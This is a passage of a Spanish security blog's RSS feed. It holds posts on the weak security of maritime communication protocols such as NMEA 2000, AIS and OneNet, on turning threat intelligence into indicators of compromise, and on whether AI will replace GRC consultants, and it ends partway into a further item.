<p>Recapitulando el post anterior, la problemática habitual en el ámbito marítimo reside en factores como la confianza en el aislamiento de las redes y en la seguridad física, unidas a la larga vida útil de los sistemas y el foco en la disponibilidad. Estas características se reflejan en la forma de diseñar y operar los buques, desde aspectos generales como las arquitecturas, hasta aspectos tan específicos como los estándares de comunicación. En este artículo se procede a analizar <strong>los protocolos marítimos más utilizados en la actualidad</strong>, en referencia a su seguridad y el riesgo de ser afectados por algunos de los tipos de ciberataques más comunes.</p>



<p>Los protocolos de red marítimos son los estándares de comunicación que definen las reglas, sintaxis y procedimientos de comunicación interna entre los sistemas de un buque y las comunicaciones entre embarcaciones. Al igual que ha ocurrido en otros ámbitos, distintas asociaciones internacionales, como NMEA (<em>National Marine Electronic Association</em>) han trabajado para establecer estándares que sean utilizados por todos los fabricantes.</p>



<span id="more-31059"></span>



<p>Estos protocolos se utilizan para comunicar los múltiples sistemas que se encuentran a bordo, como la radio VHF, el plotter, el radar, el sonar y el sensor de profundidad. Los protocolos estándares, como NMEA 2000 definen los mecanismos de comunicación entre dispositivos para asegurar compatibilidad entre dispositivos de distintos fabricantes.</p>



<p>Sin embargo, aunque hay mucha literatura e investigación sobre protocolos convencionales, como TCP/IP, se han realizado <strong>escasas indagaciones esta clase de protocolos marítimos</strong>, pese a estar ampliamente extendidos “por los siete mares”. No se puede pasar por alto el hecho de que el sector marítimo es víctima frecuente de ciberataques (<a href="https://www.bleepingcomputer.com/news/security/japans-largest-port-stops-operations-after-ransomware-attack/">Ataque contra el puerto de Nagoya, Japón</a>. <a href="https://www.washingtonpost.com/national-security/officials-israel-linked-to-a-disruptive-cyberattack-on-iranian-port-facility/2020/05/18/9d1da866-9942-11ea-89fd-28fb313d1886_story.html">Ataque contra el puerto de Shahid Rajaee, Irán</a>), por lo que es crucial seguir avanzando en la protección de los buques.</p>



<p>En esta línea de acción, el departamento de informática de la <em>Western Washington University</em>, realizó una investigación teórica que abre la puerta al análisis de estos protocolos y sus debilidades (véase <a href="https://mdpi-res.com/d_attachment/jcp/jcp-01-00013/article_deploy/jcp-01-00013.pdf?version=1618385190">Marine Network Protocols and Security Risks, by Ky Tran, Sid Keene, Erik Fretheim and Michail Tsikerdekis</a>) Nos hemos basado en esta investigación para mostrar <strong>cómo se posicionan los estándares de comunicación marítimos en el ámbito de la ciberseguridad</strong>. En primer lugar, analizaremos el análisis de los protocolos marítimos más utilizados en buques comerciales y civiles, y el riesgo de que sean afectados por algunos de los ciberataques más comunes. Posteriormente, se presenta una comparativa de estos protocolos con TCP/IP para aportar referencia al lector.</p>


<div class="wp-block-image">
<figure class="aligncenter size-large is-resized"><img decoding="async" loading="lazy" src="https://www.securityartwork.es/wp-content/uploads/2023/08/image-1-740x294.png" alt="" class="wp-image-31062" width="798" height="317" srcset="https://www.securityartwork.es/wp-content/uploads/2023/08/image-1-740x294.png 740w, https://www.securityartwork.es/wp-content/uploads/2023/08/image-1-300x119.png 300w, https://www.securityartwork.es/wp-content/uploads/2023/08/image-1-768x305.png 768w, https://www.securityartwork.es/wp-content/uploads/2023/08/image-1.png 1423w" sizes="(max-width: 798px) 100vw, 798px" /><figcaption class="wp-element-caption">Figura 1<br>Fuente: <a href="https://mdpi-res.com/d_attachment/jcp/jcp-01-00013/article_deploy/jcp-01-00013.pdf?version=1618385190">https://mdpi-res.com/d_attachment/jcp/jcp-01-00013/article_deploy/jcp-01-00013.pdf?version=1618385190</a></figcaption></figure></div>


<h2 class="wp-block-heading">NMEA 2000</h2>



<p>Este protocolo <em>open source</em> es un <strong>estándar muy utilizado en todo tipo de buques, y está basado en el protocolo Bus CAN – J1939</strong> (<a href="https://www.securityartwork.es/2023/03/21/introduccion-a-can-caracteristicas-y-poc-sobre-el-bus/">aquí puedes encontrar más información sobre este protocolo y sus debilidades</a>). Este protocolo, al igual que CAN, permite la comunicación entre dispositivos conectados a un único bus de comunicaciones. Todos los dispositivos reciben todos los mensajes, y deciden si deben hacer algo con esa información, o si deben ignorarla.</p>



<p>El protocolo NMEA 2000 fue diseñado para tener una gran robustez en la detección de errores de transmisión, confirmación de envío de paquetes y latencia reducida. Sin embargo, <strong>no incorpora ningún mecanismo de seguridad</strong>. Por esta razón, es un protocolo altamente vulnerable a todos los tipos de ataques analizados.</p>



<ul>
<li><em>DoS</em>: debido a su limitado ancho de banda (250 Kbps), es vulnerable a una inyección de paquetes, que puede inundar fácilmente la red de mensajes falsos con alta prioridad, bloqueando así el resto de las comunicaciones.</li>



<li><em>Spoofing</em>: El único tipo de identificador de qué nodo envía el mensaje es el código PGN insertado en cada paquete. Un atacante podría suplantar la identidad de un nodo simplemente copiando este parámetro, lo que permitiría falsear cualquier comunicación proveniente de este dispositivo.</li>



<li><em>Packet Sniffing</em>: Al ser un protocolo tipo bus, todos los mensajes se envían en broadcast, a todos los nodos. Esto, unido a que no se trata de un protocolo cifrado, convierte este ataque en algo trivial. Actualmente, herramientas como Wireshark o SavvyCAN permiten analizar este tipo de comunicaciones con facilidad.</li>



<li><em>Replay/MiTM</em>: De nuevo, al ser un protocolo tipo bus sin protecciones de seguridad, si un dispositivo se conecta entre un nodo y el resto, resulta sencillo alterar la comunicación desde/hacia este, suplantando la información inyectada a la red.</li>
</ul>



<h2 class="wp-block-heading"><strong>NMEA 0183</strong></h2>



<p>Se trata de otro protocolo <em>open source</em> utilizado frecuentemente en barcos, en este caso para la <strong>transmisión unidireccional de datos</strong>. Esto quiere decir que las redes están formadas por un dispositivo emisor y uno o varios dispositivos receptores. Los datos se transmiten en forma de cadenas ASCII a través de un cable serie (RS-232 o RS422), aunque también se puede utilizar sobre UDP en una red ethernet. Pese a que este protocolo es el predecesor de NMEA 2000, aún se utiliza de manera mayoritaria en buques comerciales.</p>



<p>De nuevo, este protocolo <strong>no incorpora ningún tipo de medidas de seguridad</strong>, por lo que es altamente vulnerable:</p>



<ul>
<li><em>DoS</em>: debido a su bajo ancho de banda (9.6 Kbps), es vulnerable a este tipo de ataques. Un atacante podría saturar la red con facilidad, bloqueando las comunicaciones.</li>



<li><em>Spoofing/Packet Sniffing</em>: Al transmitir los datos en formato ASCII sin ningún tipo de cifrado, ambos ataques son triviales. Un atacante conectado a la red podría inyectar, por ejemplo, lecturas falsas del GPS.</li>



<li><em>Replay/MiTM</em>: De nuevo, al no tener protecciones de seguridad, es relativamente sencillo interceptar las comunicaciones y modificarlas, especialmente si se usa el protocolo sobre UDP.</li>
</ul>



<h2 class="wp-block-heading"><strong>AIS</strong></h2>



<p>El AIS (<em>Automatic Identification System</em>) es un sistema de tracking <strong>utilizado por los transceptores de los barcos, para gestión de tráfico marítimo</strong>. Este protocolo se utiliza para la comunicación y <em>broadcast</em> a otros barcos de metadatos vía VHF. Estos metadatos incluyen información sobre el nombre, las coordenadas y otros parámetros relevantes para la navegación. En general, estos mensajes se transmiten a través del puerto UDP 5321.</p>



<p>Este protocolo <strong>no incorpora medidas de seguridad</strong>, aunque existe una versión, menos utilizada, que cifra el tráfico (EAIS). En referencia a la vulnerabilidad frente a los distintos ataques:</p>



<ul>
<li><em>DoS</em>: El limitado ancho de banda (9.6 Kbps), unido a características específicas del protocolo lo hacen extremadamente vulnerable a este tipo de ataques. Por ejemplo, un atacante podría denegar la transmisión de mensajes enviando, repetidamente, y de forma sincronizada, un comando a la víctima para retrasar la retransmisión de mensajes por un tiempo definido.</li>



<li><em>Spoofing</em>: Al no disponer de medidas de seguridad, se puede “engañar” fácilmente a los barcos que utilizan este protocolo. Por ejemplo, creando un “barco falso” que aparezca en el radar del receptor.</li>



<li><em>Packet Sniffing</em>: al no tener encriptación y usarse habitualmente en modo broadcast, es trivial interceptar y leer los datos transmitidos.</li>



<li><em>Replay/MiTM</em>: interceptar y modificar la comunicación entre dos barcos es relativamente sencillo, debido a la falta de mecanismos de protección. Un ataque de estas características podría, por ejemplo, modificar la posición real de un buque a ojos de otro, causando una situación de confusión y peligro.</li>
</ul>



<h2 class="wp-block-heading"><strong>OneNet</strong></h2>



<p>Se trata de un <strong>nuevo estándar de comunicación</strong>, basado en NMEA 2000. Está diseñado para la comunicación por redes marítimas a través de IPv6, manteniendo opciones de compatibilidad con sus protocolos predecesores, a través de pasarelas. Cada dispositivo debe ejecutar una aplicación OneNet para comunicarse con la red.</p>



<p>Este protocolo <strong>permite un “modo seguro”</strong> que utiliza un túnel cifrado para la transmisión de información. En este caso, se debe establecer este túnel a través del método <em>Anonymus Diffie-Hellman</em>, con el dispositivo “encargado” de la seguridad y el acceso a la red, conocido como HID. En caso de que esta opción segura sea activada, cada dispositivo debe obtener un certificado (expedido a través de un software específico) para poder acceder a la red. En referencia a la vulnerabilidad frente a los distintos ataques:</p>



<ul>
<li><em>DoS</em>: El ancho de banda soportado por las redes OneNet (ethernet) es mucho mayor que el de los protocolos previamente mencionados, por lo que por lo que, a priori, es menos susceptible a este tipo de ataques.</li>



<li><em>Spoofing:</em> Si las medidas de seguridad están activadas, las comunicaciones se realizan a través de un túnel cifrado, lo que reduce la vulnerabilidad frente a estos ataques. No obstante, un atacante podría suplantar a un HID, haciendo que el dispositivo en cuestión se una a una “red falsa”, obteniendo así la información.</li>



<li><em>Packet Sniffing:</em> Si la comunicación se realiza a través del túnel cifrado, el contenido no podrá ser interceptado y leído por un atacante. De nuevo, esta protección podría ser evadida como en el caso anterior.</li>



<li><em>Replay/MiTM:</em> Debido a que el método <em>Anonymous Diffie-Hellman</em> no autentica la clave compartida, un atacante podría falsificar la conexión al inicio del proceso, haciéndolo por tanto susceptible a ataques de MiTM. No obstante, el protocolo tiene protección frente a ataques de <em>Replay</em>, ya que los mensajes están numerados con un código que no puede ser reutilizado.</li>
</ul>



<p>A modo de resumen, se presenta una comparativa de estos protocolos marítimos y el protocolo TCP/Ipv6. Este último se ha seleccionado como referencia para contrastar las similitudes y diferencias en el riesgo que presentan frente a los ciberataques analizados: </p>


<div class="wp-block-image">
<figure class="aligncenter size-large is-resized"><img decoding="async" loading="lazy" src="https://www.securityartwork.es/wp-content/uploads/2023/08/image-2-740x174.png" alt="" class="wp-image-31063" width="838" height="197" srcset="https://www.securityartwork.es/wp-content/uploads/2023/08/image-2-740x174.png 740w, https://www.securityartwork.es/wp-content/uploads/2023/08/image-2-300x71.png 300w, https://www.securityartwork.es/wp-content/uploads/2023/08/image-2-768x181.png 768w, https://www.securityartwork.es/wp-content/uploads/2023/08/image-2-1536x362.png 1536w, https://www.securityartwork.es/wp-content/uploads/2023/08/image-2.png 1737w" sizes="(max-width: 838px) 100vw, 838px" /><figcaption class="wp-element-caption">Figura 2<br>Fuente: <a href="https://mdpi-res.com/d_attachment/jcp/jcp-01-00013/article_deploy/jcp-01-00013.pdf?version=1618385190">https://mdpi-res.com/d_attachment/jcp/jcp-01-00013/article_deploy/jcp-01-00013.pdf?version=1618385190</a></figcaption></figure></div>


<p>En conclusión, los protocolos marítimos “tradicionales” parten de una problemática similar a otros protocolos industriales: están centrados en la disponibilidad e integridad de las comunicaciones, y no en la confidencialidad. Están diseñados para casos de uso, y no de abuso. Se confía plenamente en el aislamiento de las redes, la seguridad física y la seguridad por oscuridad como protección frente a ciberataques. Sin embargo, las soluciones de conectividad para todo tipo de sistemas son cada vez más frecuentes. Por ejemplo, para realizar mantenimientos remotos. En esa línea, es cuestión de tiempo que una red “aislada” deje de estarlo.</p>



<p>Aunque se está avanzando en el ámbito de la ciberseguridad, con nuevos estándares propuestos, como OneNet, aún <strong>queda un largo camino por recorrer</strong>. Por un lado, las restricciones propias del sector limitan las medidas de seguridad que pueden ser implementadas, lo que hace que incluso los nuevos protocolos sean vulnerables a ciertos ataques desde el diseño. Por otra parte, la sustitución de los protocolos de comunicación antiguos es una tarea ardua, y muy a largo plazo, que debe involucrar a fabricantes, integradores y dueños.</p>
<p>La entrada <a rel="nofollow" href="https://www.securityartwork.es/2023/08/16/ciberseguridad-en-el-sector-naval-protocolos-maritimos-de-comunicacion/">Ciberseguridad en el sector naval: Protocolos marítimos de comunicación</a> aparece primero en <a rel="nofollow" href="https://www.securityartwork.es">Security Art Work</a>.</p>
]]></content:encoded>
					
					<wfw:commentRss>https://www.securityartwork.es/2023/08/16/ciberseguridad-en-el-sector-naval-protocolos-maritimos-de-comunicacion/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>De la inteligencia a la detección de amenazas</title>
		<link>https://www.securityartwork.es/2023/08/02/de-la-inteligencia-a-la-deteccion-de-amenazas/</link>
					<comments>https://www.securityartwork.es/2023/08/02/de-la-inteligencia-a-la-deteccion-de-amenazas/#respond</comments>
		
		<dc:creator><![CDATA[Antonio Villalón]]></dc:creator>
		<pubDate>Wed, 02 Aug 2023 10:52:59 +0000</pubDate>
				<category><![CDATA[General]]></category>
		<guid isPermaLink="false">https://www.securityartwork.es/?p=31046</guid>

					<description><![CDATA[<p>La detección de las amenazas se realiza en buena parte a partir de indicadores de compromiso. Estos indicadores son observables que identificamos en la gestión de un incidente o en una investigación, que nos llegan de terceros en forma de feeds de inteligencia, que descargamos de plataformas como MISP, que compartimos entre grupos de trabajo… [&#8230;]</p>
<p>La entrada <a rel="nofollow" href="https://www.securityartwork.es/2023/08/02/de-la-inteligencia-a-la-deteccion-de-amenazas/">De la inteligencia a la detección de amenazas</a> aparece primero en <a rel="nofollow" href="https://www.securityartwork.es">Security Art Work</a>.</p>
]]></description>
										<content:encoded><![CDATA[
<p>La detección de las amenazas se realiza en buena parte a partir de indicadores de compromiso. Estos indicadores son observables que identificamos en la gestión de un incidente o en una investigación, que nos llegan de terceros en forma de <em>feeds</em> de inteligencia, que descargamos de plataformas como MISP, que compartimos entre grupos de trabajo… En definitiva, los descubrimos o nos los descubren. Pero ¿de dónde vienen estos indicadores? De una u otra forma los indicadores, parte fundamental para la caracterización de una amenaza (actor, operación…) provienen del análisis de inteligencia. En este post vamos a comentar el camino desde la adquisición de información hasta la generación de indicadores de compromiso para la detección de una amenaza. Este camino se resume en la figura siguiente:</p>


<div class="wp-block-image">
<figure class="aligncenter"><img decoding="async" loading="lazy" width="1220" height="488" src="https://www.securityartwork.es/wp-content/uploads/2023/08/cybint.png" alt="" class="wp-image-31047" srcset="https://www.securityartwork.es/wp-content/uploads/2023/08/cybint.png 1220w, https://www.securityartwork.es/wp-content/uploads/2023/08/cybint-300x120.png 300w, https://www.securityartwork.es/wp-content/uploads/2023/08/cybint-740x296.png 740w, https://www.securityartwork.es/wp-content/uploads/2023/08/cybint-768x307.png 768w" sizes="(max-width: 1220px) 100vw, 1220px" /></figure></div>


<p>Todos sabemos que las diferentes disciplinas de adquisición de inteligencia juegan un papel fundamental en la detección de amenazas en el ciberespacio. En este ámbito ciber cada una de estas disciplinas (simplificando, SIGINT, MASINT, HUMINT, OSINT y GEOINT) tiene un peso específico y aporta un valor determinado, conformando la base de lo que llamamos ciber inteligencia. Por ejemplo, el rol de la inteligencia de señales tiene habitualmente mucho más peso que el de la inteligencia geoespacial, y las fuentes humanas aportan mucha menos inteligencia que las señales, pero bien manejadas, de mucho más valor.</p>



<span id="more-31046"></span>



<p>Todas las disciplinas de adquisición permiten generar inteligencia en tres niveles. En el más alto, el estratégico, encontramos inteligencia ligada a aspectos como la atribución de una operación hostil, los objetivos de un actor o la estrategia definida para lograrlos. Aunque evidentemente es muy relevante para caracterizar a una amenaza, esta inteligencia no es observable de forma directa, por lo que es difícil de convertir en inteligencia accionable.</p>



<p>Por debajo de la inteligencia estratégica encontramos la inteligencia operacional, en la que identificamos tácticas y técnicas de los actores hostiles y, por último, en el nivel inferior encontramos la inteligencia táctica, que permite identificar observables de bajo nivel ligados a una amenaza: direcciones IP, hashes… casi todo lo que habitualmente encontramos en un MISP. La inteligencia generada en ambos niveles ya puede convertirse en inteligencia accionable, inteligencia que permite una toma de decisiones ágil y eficiente (no entraremos en la calidad de la inteligencia de ninguno de los niveles, que es una discusión muuuuy larga para otro post).</p>



<p>A partir de esta inteligencia accionable, tanto de las tácticas y técnicas (inteligencia operacional) como de los observables de bajo nivel (inteligencia táctica), especificamos indicadores de compromiso que nos permiten detectar amenazas. Estos indicadores pueden ser tanto conductuales (los que especifican tácticas y técnicas) como de menor nivel (atómicos o computados). Evidentemente, los indicadores conductuales aportan mucho más valor a la detección que los indicadores de menor nivel. Tienen un mayor tiempo de vida y son más difíciles de modificar por parte del actor hostil, por lo que la capacidad de detección que proporcionan es mucho más valiosa.</p>



<p>El despliegue de indicadores de compromiso en nuestra infraestructura de seguridad, y el intercambio de los mismos con terceros, permiten la detección ágil de las amenazas. Aunque idealmente deberíamos trabajar con indicadores conductuales, en la práctica la mayor parte de IOC que encontramos en plataformas de intercambio, como MISP son indicadores de bajo nivel, sobre todo IP, dominios, mutexes&#8230;</p>



<p>Veamos un ejemplo que recorre el camino completo. El análisis de un código dañino nos proporciona el hash del ejecutable y una dirección IP de mando y control a la que conecta para recibir órdenes. En este caso, a partir de la inteligencia de fuentes técnicas (MASINT en nuestra clasificación) generamos una inteligencia táctica que especificamos de manera directa en forma de indicadores de compromiso. Podemos desplegar ambos indicadores de bajo nivel en nuestros sistemas de seguridad, por ejemplo, tanto el hash como la IP en nuestro XDR y adicionalmente la IP en los sistemas de seguridad perimetral. Con estos indicadores desplegados, ya somos capaces de detectar la presencia de este código dañino en nuestra organización (e incluso de bloquear su actividad). No obstante, si tenemos ese mismo código cambiando su hash o usando una IP diferente para mando y control, cambios triviales para el actor hostil, no somos capaces de detectarlo. Adicionalmente, el análisis de inteligencia técnica puede generar inteligencia operacional y proporcionarnos un indicador conductual: por ejemplo una secuencia de peticiones HTTPS para mando y control, en un intervalo específico o con un patrón determinado, sin importar el destino al que se envíe el tráfico. Si somos capaces de especificar este comportamiento, por ejemplo en nuestro SIEM, seremos capaces de detectar la actividad del código dañino incluso aunque cambie su IP de mando y control o su hash. De esta manera, si el actor hostil quiere pasar desapercibido, estamos obligándole a que modifique en mayor profundidad su código para que se comporte de forma diferente, lo que evidentemente es más caro que cambiar una IP o un hash.</p>



<p>Los indicadores de compromiso pueden ser cargados en los dispositivos de seguridad de las organizaciones y proporcionan resultados inmediatos. Ya hablamos en un <a href="https://www.securityartwork.es/2020/07/28/los-ioc-han-muerto-larga-vida-a-los-ioc/">post en Security Art Work</a>, hace tres años, sobre los tipos de indicadores y de su utilidad. Pero, sobre todo, de la problemática de trabajar principalmente con indicadores de bajo nivel y no trabajar con indicadores conductuales. Simplificando, mientras sigamos trabajando con estos indicadores de bajo nivel (de nuevo, casi todo lo que podemos encontrar en un MISP: hashes, IP, nombres de dominio&#8230;) la detección de amenazas avanzadas es compleja; siempre lo es, pero si no somos capaces de especificar y compartir inteligencia operacional, lo tendremos más difícil todavía.</p>
<p>La entrada <a rel="nofollow" href="https://www.securityartwork.es/2023/08/02/de-la-inteligencia-a-la-deteccion-de-amenazas/">De la inteligencia a la detección de amenazas</a> aparece primero en <a rel="nofollow" href="https://www.securityartwork.es">Security Art Work</a>.</p>
]]></content:encoded>
					
					<wfw:commentRss>https://www.securityartwork.es/2023/08/02/de-la-inteligencia-a-la-deteccion-de-amenazas/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>IA vs. GRC: Cómo la IA puede afectar a las áreas GRC de consultoras tecnológicas</title>
		<link>https://www.securityartwork.es/2023/07/03/ia-vs-grc-como-la-ia-puede-afectar-a-las-areas-grc-de-consultoras-tecnologicas/</link>
					<comments>https://www.securityartwork.es/2023/07/03/ia-vs-grc-como-la-ia-puede-afectar-a-las-areas-grc-de-consultoras-tecnologicas/#respond</comments>
		
		<dc:creator><![CDATA[Raúl Manso]]></dc:creator>
		<pubDate>Mon, 03 Jul 2023 09:13:33 +0000</pubDate>
				<category><![CDATA[General]]></category>
		<guid isPermaLink="false">https://www.securityartwork.es/?p=31041</guid>

					<description><![CDATA[<p>La IA (Inteligencia Artificial) ha demostrado ser una herramienta poderosa en diversas áreas, incluidas el Gobierno de la seguridad, la gestión de Riesgos y el Cumplimiento normativo (GRC, Governance, Risk and Compliance por sus siglas en inglés). A medida que la IA continúa desarrollándose y desempeñando un papel cada vez más importante en nuestra sociedad [&#8230;]</p>
<p>La entrada <a rel="nofollow" href="https://www.securityartwork.es/2023/07/03/ia-vs-grc-como-la-ia-puede-afectar-a-las-areas-grc-de-consultoras-tecnologicas/">IA vs. GRC: Cómo la IA puede afectar a las áreas GRC de consultoras tecnológicas</a> aparece primero en <a rel="nofollow" href="https://www.securityartwork.es">Security Art Work</a>.</p>
]]></description>
										<content:encoded><![CDATA[
<p>La IA (Inteligencia Artificial) ha demostrado ser una herramienta poderosa en diversas áreas, incluidas el Gobierno de la seguridad, la gestión de Riesgos y el Cumplimiento normativo (GRC, Governance, Risk and Compliance por sus siglas en inglés). A medida que la IA continúa desarrollándose y desempeñando un papel cada vez más importante en nuestra sociedad es fundamental reconocer el valor y la importancia del componente humano. Si bien la IA ofrece avances tecnológicos significativos, hay áreas en las que el juicio humano, la experiencia y las habilidades interpersonales son indispensables.</p>



<p>Nosotros, como trabajadores de consultoras y en concreto del área de GRC analizamos la repercusión y el impacto que la llegada de la IA puede tener en nuestro ámbito profesional.</p>



<p>¿Acabará la IA con nuestros puestos de trabajo? Esta es una pregunta que después del boom mediático que ha supuesto la irrupción de ChatGPT en nuestras vidas nos hacemos sin poder evitarlo, por ello, me he propuesto realizar un análisis para comprender si la IA podría llegar a sustituir el trabajo que desarrollamos en nuestros clientes, por lo que a continuación me permito aportar mi punto de vista sobre diferentes aspectos y/o razones por las cuales, a mi juicio, entiendo que es poco probable que la IA pueda sustituir o al menos asumir el trabajo desarrollado en las áreas de GRC de las consultoras tecnológicas:</p>



<h2 class="wp-block-heading"><strong>Complejidad de la regulación</strong></h2>



<p>Las regulaciones y leyes relacionadas con la gestión del riesgo y el cumplimiento normativo pueden llegar a ser extremadamente complejas. La IA puede ayudar en la automatización de ciertas tareas relacionadas con el trabajo desarrollado por las áreas de GRC, pero la interpretación de las regulaciones y la toma de decisiones en situaciones complejas a menudo requieren un juicio humano y un conocimiento experto del contexto empresarial e incluso a veces humano, así como no menos importante de aspectos presupuestarios y financieros. Las consultoras desempeñan un papel crucial al proporcionar orientación especializada sobre cómo cumplir con las regulaciones y adaptarse a los cambios normativos en base a las necesidades de los clientes.</p>



<span id="more-31041"></span>



<p>Un ejemplo de esta complejidad podemos trasladarla a la ejecución de un proyecto basado en la norma ISO 27001. Esta norma exige que las organizaciones realicen una evaluación de riesgos para identificar y evaluar los riesgos a los que se enfrenta la información dentro de la organización. Esta evaluación debe tener en cuenta los activos de información, las amenazas a los activos, las vulnerabilidades existentes y el impacto potencial en caso de una brecha de seguridad. Una vez realizada la evaluación de riesgos, la organización debe seleccionar los controles de seguridad apropiados para mitigar los riesgos identificados y aquí es donde la IA no puede entrar debido a la complejidad que surge debido a que la evaluación de riesgos y la selección de controles no son procesos estándar y predefinidos. Cada organización tiene sus propias características, activos de información, amenazas y vulnerabilidades específicas. Esto implica que la evaluación de riesgos y la selección de controles deben ser adaptadas a las necesidades y contextos particulares de cada organización como por ejemplo el budget en tecnología que la empresa puede o quiere asumir.</p>



<p>En este escenario, las consultoras con experiencia en ISO 27001 desempeñan un papel clave al brindar asesoramiento especializado, guiar el proceso de evaluación de riesgos y proporcionar recomendaciones sobre los controles de seguridad más adecuados para garantizar el cumplimiento de la norma y proteger la información de la organización.</p>



<h2 class="wp-block-heading"><strong>Contexto empresarial y cultural</strong></h2>



<p>No se trata solo de cumplir con las regulaciones, sino también de comprender el contexto empresarial y cultural en el que opera una organización. Esto implica considerar factores específicos de la industria, las políticas internas de una empresa, las mejores prácticas y los riesgos específicos que enfrenta. La IA puede ayudar en el análisis de datos y proporcionar información valiosa, pero la comprensión completa del contexto empresarial y la toma de decisiones estratégicas requieren de la experiencia y el conocimiento humano.</p>



<p>Por ejemplo, consideremos una empresa del sector financiero que está sujeta a regulaciones específicas para prevenir el blanqueo de capitales. Si bien la IA puede ayudar en la detección de transacciones sospechosas o patrones inusuales, comprender el perfil de riesgo específico de la empresa, su modelo de negocio, las particularidades de su industria y las mejores prácticas requiere un conocimiento experto y una evaluación holística que va más allá de los análisis automatizados. Las consultoras pueden ofrecer una combinación de experiencia sectorial, conocimiento normativo, pero sobre todo de comprensión del entorno empresarial para ayudar a las organizaciones a desarrollar estrategias de gestión de riesgos y cumplimiento personalizadas.</p>



<h2 class="wp-block-heading"><strong>Confidencialidad y ética</strong></h2>



<p>Trabajar en una consultara dedicada a la seguridad de la información y en concreto en el área de GRC implica trabajar con información confidencial y sensible como datos financieros, información personal y secretos comerciales. Las consultoras están comprometidas con salvaguardar la confidencialidad y aplicar prácticas éticas en el manejo de datos de sus clientes. La confidencialidad y la ética son fundamentales en estas áreas, y las consultoras tienen protocolos y medidas de seguridad establecidos para proteger la información de sus clientes. Si bien la IA puede ser útil en ciertas tareas automatizables, es importante asegurarse de que se cumplan los estándares éticos y de seguridad al utilizar esta información en proyectos relacionados con GRC.</p>



<p>Por ejemplo, en el ámbito de la ciberseguridad, una consultora puede ayudar a una organización a evaluar sus vulnerabilidades y fortalezas, pero también a diseñar políticas de seguridad de la información y a implementar medidas de protección adecuadas. La aplicación de la IA en este contexto debería poder cumplir con estándares éticos y de seguridad rigurosos para evitar la filtración o mal uso de información confidencial, circunstancia que hoy en día no se da.</p>



<h2 class="wp-block-heading"><strong>Relaciones interpersonales, comunicación y pensamiento innovador</strong></h2>



<p>Trabajar en consultoría y en concreto en un área GRC implica interacciones con diversas partes interesadas, como reguladores, clientes, proveedores y empleados. La comunicación efectiva y la gestión de relaciones son cruciales en estas interacciones. La comunicación efectiva, la negociación y la resolución de conflictos son habilidades críticas, y aunque la IA ha avanzado en el procesamiento del lenguaje natural y puede ayudar en algunas interacciones, todavía se enfrenta a desafíos para comprender plenamente el contexto y el subtexto en la comunicación humana, y en este sentido, pasarán muchos años hasta que la IA alcance una “conciencia” que pueda asumir estas habilidades. Las consultoras y sus empleados si aportan esas habilidades interpersonales y experiencia en la gestión de relaciones para brindar un enfoque más completo y sobre todo práctico en estas situaciones.</p>



<p>Aunque la IA puede ser capaz de generar resultados predecibles y seguir patrones establecidos, la creatividad y el pensamiento innovador son atributos distintivamente humanos. La capacidad de resolver problemas complejos, encontrar soluciones fuera de lo común y generar ideas nuevas y originales son habilidades que aún no se han replicado plenamente en las máquinas. Estas habilidades son fundamentales para impulsar la innovación y el progreso en todos los ámbitos de la sociedad.</p>



<p>Por ejemplo, en una situación en la que una organización enfrenta una investigación regulatoria, la consultora puede brindar asesoramiento sobre cómo responder, interactuar con los reguladores y abordar los problemas identificados. Si bien la IA puede automatizar ciertos aspectos de la comunicación, como el análisis del lenguaje en correos electrónicos o documentos legales, todavía no es capaz de comprender plenamente el contexto, el subtexto y las emociones involucradas en las interacciones humanas. Aquí es donde las habilidades interpersonales y la experiencia de las consultoras son invaluables para ayudar a las organizaciones a navegar situaciones complejas y sensibles.</p>



<p>Dicho lo anterior, aunque la IA puede ser una herramienta valiosa en el campo del GRC, hay limitaciones en su capacidad para reemplazar por completo a las áreas de GRC de las consultoras. La complejidad de las regulaciones, la necesidad de comprender el contexto empresarial, la confidencialidad de la información y las habilidades interpersonales requeridas hacen que las consultoras sean, a mi juicio, indispensables para brindar asesoramiento especializado, adaptado a las necesidades específicas de las organizaciones.</p>



<p>El juicio humano, la interpretación del contexto, la ética, la creatividad, las habilidades interpersonales y la empatía son aspectos que los consultores (seres humanos al fin y al cabo) aportan y que considero que no pueden ser reemplazados por la IA.</p>



<p>Como conclusión, y sin querer demonizar a la IA, entiendo que la combinación de la inteligencia humana y la IA puede llevar a resultados más completos y equilibrados en diversos campos y en concreto en el de GRC, de manera que se pueda fomentar un enfoque centrado en las necesidades del cliente, por ello, ni GRC puede obviar que la IA ya está aquí, ni la IA ha llegado para sustituir a las áreas de Gobierno, Riesgo y Cumplimiento.</p>
<p>La entrada <a rel="nofollow" href="https://www.securityartwork.es/2023/07/03/ia-vs-grc-como-la-ia-puede-afectar-a-las-areas-grc-de-consultoras-tecnologicas/">IA vs. GRC: Cómo la IA puede afectar a las áreas GRC de consultoras tecnológicas</a> aparece primero en <a rel="nofollow" href="https://www.securityartwork.es">Security Art Work</a>.</p>
]]></content:encoded>
					
					<wfw:commentRss>https://www.securityartwork.es/2023/07/03/ia-vs-grc-como-la-ia-puede-afectar-a-las-areas-grc-de-consultoras-tecnologicas/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Racismo vs. Ciberseguridad. Protegiendo la igualdad en el mundo digital</title>
		<link>https://www.securityartwork.es/2023/06/08/racismo-vs-ciberseguridad-protegiendo-la-igualdad-en-el-mundo-digital/</link>
					<comments>https://www.securityartwork.es/2023/06/08/racismo-vs-ciberseguridad-protegiendo-la-igualdad-en-el-mundo-digital/#respond</comments>
		
		<dc:creator><![CDATA[Raúl Manso]]></dc:creator>
		<pubDate>Thu, 08 Jun 2023 11:24:20 +0000</pubDate>
				<category><![CDATA[General]]></category>
		<guid isPermaLink="false">https://www.securityartwork.es/?p=31034</guid>

					<description><![CDATA[<p>Aprovechando la coyuntura, me permito correlacionar la situación actual de aumento del racismo en el deporte con mi ámbito profesional, la ciberseguridad. En el mundo actual cada vez más interconectado la ciberseguridad se ha convertido en una preocupación primordial, sin embargo, pocos se detienen a considerar la relación entre la ciberseguridad y el racismo. A [&#8230;]</p>
<p>La entrada <a rel="nofollow" href="https://www.securityartwork.es/2023/06/08/racismo-vs-ciberseguridad-protegiendo-la-igualdad-en-el-mundo-digital/">Racismo vs. Ciberseguridad. Protegiendo la igualdad en el mundo digital</a> aparece primero en <a rel="nofollow" href="https://www.securityartwork.es">Security Art Work</a>.</p>
]]></description>
